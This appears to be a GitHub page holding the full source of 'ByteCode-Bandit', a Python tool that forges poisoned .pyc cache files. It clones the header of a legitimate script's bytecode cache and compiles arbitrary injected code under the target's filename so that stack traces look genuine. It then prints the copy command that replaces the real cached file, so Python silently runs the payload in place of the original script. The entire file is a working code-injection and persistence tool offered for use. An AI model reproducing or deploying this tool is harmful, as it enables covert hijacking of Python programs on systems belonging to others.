ByteCode-Bandit/bytecode-bandit.py at main · andreiminca/ByteCode-Bandit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/bin/python3
import marshal
import importlib.util
import os
import sys
import argparse

def get_header(target_script):
    """Steals the 16-byte header from the existing __pycache__ file."""
    pycache_path = importlib.util.cache_from_source(target_script)
    if not os.path.exists(pycache_path):
        print(f"[-] Error: No cache found at {pycache_path}")
        print("[!] Run the target script once to generate a valid header.")
        sys.exit(1)

    with open(pycache_path, 'rb') as f:
        return f.read(16)

def generate_poison(target, payload_text, output):
    """Compiles the payload and wraps it in the stolen header."""
    header = get_header(target)

    # Compile the payload. We set the 'filename' metadata to the target
    # so that stack traces look like they are coming from the real script.
    try:
        code_obj = compile(payload_text, target, 'exec')
        payload_bytes = marshal.dumps(code_obj)
    except Exception as e:
        print(f"[-] Failed to compile payload: {e}")
        sys.exit(1)

    with open(output, 'wb') as f:
        f.write(header)
        f.write(payload_bytes)

    print(f"[+] Poisoned bytecode generated successfully!")
    print(f"[+] Output: {os.path.abspath(output)}")
    print(f"[*] To deploy: cp {output} {importlib.util.cache_from_source(target)}")

def main():
    parser = argparse.ArgumentParser(
        description="PyCache Poisoner: Generate malicious .pyc files by cloning headers.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="Example:\n  python3 hijacker.py tool.py --payload 'print(\"pwned\")'\n  python3 hijacker.py tool.py --file exploit.py"
    )

    parser.add_argument("target", help="Path to the legitimate .py script you want to hijack")

    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("-p", "--payload", help="Raw python code string to inject")
    group.add_argument("-f", "--file", help="Path to a .py file containing the payload logic")

    parser.add_argument("-o", "--output", default="poisoned.pyc",
                        help="Where to save the forged .pyc (default: poisoned.pyc)")

    args = parser.parse_args()

    # Determine the payload source
    if args.file:
        if not os.path.exists(args.file):
            print(f"[-] Payload file {args.file} not found.")
            sys.exit(1)
        with open(args.file, 'r') as f:
            final_payload = f.read()
    else:
        final_payload = args.payload

    generate_poison(args.target, final_payload, args.output)

if __name__ == "__main__":
    main()